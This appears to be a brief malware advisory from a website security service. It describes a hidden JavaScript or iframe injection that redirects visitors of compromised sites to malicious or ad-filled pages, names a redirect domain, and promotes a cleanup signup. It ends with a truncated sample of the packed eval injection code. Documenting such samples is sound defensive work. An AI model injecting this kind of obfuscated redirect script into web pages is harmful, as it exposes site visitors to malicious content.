Description:
A hidden and suspicious javascript (or iframe) was found on the site. It is used to redirect the visitor of the compromised site to malicious pages or fake search engines, full of ads. Some details here.
http://superpuperdomain.com/count.php
(and many other domains).
Affecting:
Any web site
Clean up:
This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: http://sucuri.net/signup
Malware dump (sample of malware):
<!-- scounter --><script language="JavaScript">eval( function( p,a,c,k,e,r)..